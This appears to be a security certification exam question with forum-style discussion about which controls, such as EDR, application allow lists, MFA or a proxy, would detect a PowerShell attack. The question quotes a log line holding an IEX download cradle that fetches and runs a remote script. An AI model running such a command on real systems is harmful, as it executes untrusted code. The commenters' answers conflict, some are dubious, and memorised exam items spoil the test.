A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell `IEX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois`
Which of the following security controls would have alerted and prevented the next phase of the attack?
To alert and prevent the execution of a PowerShell command that downloads and runs a script, Endpoint Detection and Response (EDR) along with an application-approved list would be effective. EDR can detect and alert on suspicious activities such as unexpected PowerShell executions, providing visibility and response capabilities. An application-approved list would prevent unauthorized applications like malicious PowerShell scripts from running. This combination directly addresses the nature of the attack described.
An EDR and whitelist should protect from this attack.
Is the key word(s) actual "next phase"? If so, MFA would prevent logins and a forward proxy could prevent a compromised workstation from reaching directly home. I'm not certain about the proxy, please tell me if I'm wrong.
I agree. To alert and prevent the next phase of the attack, the security analyst should consider implementing a forward proxy and MFA (Multi-Factor Authentication). This is the most effective answer for the NEXT phase of the attack. In this case, a forward proxy could be configured to block access to the external-facing mail server based on the number of failed login attempts, which would help prevent the attack from progressing. By implementing MFA, the organization can help prevent unauthorized access to the external-facing mail server, even if an attacker is able to obtain a user's password.
It would not have alerted the next phase of the attack like an EDR
A forward proxy would have sent out an alert in the 'next' phase of an attack, which is the login attempts. The application list will not stop anything in this regard. Read Bucket's response below. If it wasn't asking for 'next' phase than EDR would be correct for the current phase.
Key word alerted, EDR does that
EDR and application whitelisting are the only things that would see a PowerShell script spawn a new process and understand that it is not baseline behavior to respond effectively. Source: Verifying each answer against Chat GPT, my experience, other test banks, a written book, and weighing in the discussion from all users to create a 100% accurate guide for myself before I take the exam. (It isn't easy because of the time needed, but it is doing my diligence)
The PowerShell command is using the Invoke-Expression (IEX) function to execute a remote script hosted on a third-party website. This is an example of fileless malware, which can bypass traditional antivirus solutions.
if you think about this from MITRE perspective, the attacker is in the initial access (with doing some extra recon) phase. Next phase should be execution - to try to run malicious code. So answer should be C Bruteforcing phase is over as indicated in the question (analyst found that evidence in the logs) so MFA at this point is bit too late. B. would help but not alert. And help only partially, attacke would eventually find a way to bypass this A. Antivirus could prevent and UEBA could alert, but C is already much safer option.
"alerted" narrows the options down to A and C. Since it involves failed login attempts, a user account must have been accessed. UEBA would have flagged anomalies regarding a user's actions (running PowerShell). There was no further indication of the attacker using other applications, as they are downloading PS scripts. Approved application lists would not have done if PS successfully ran (meaning that PS was on the list) and the attacker continued using PS.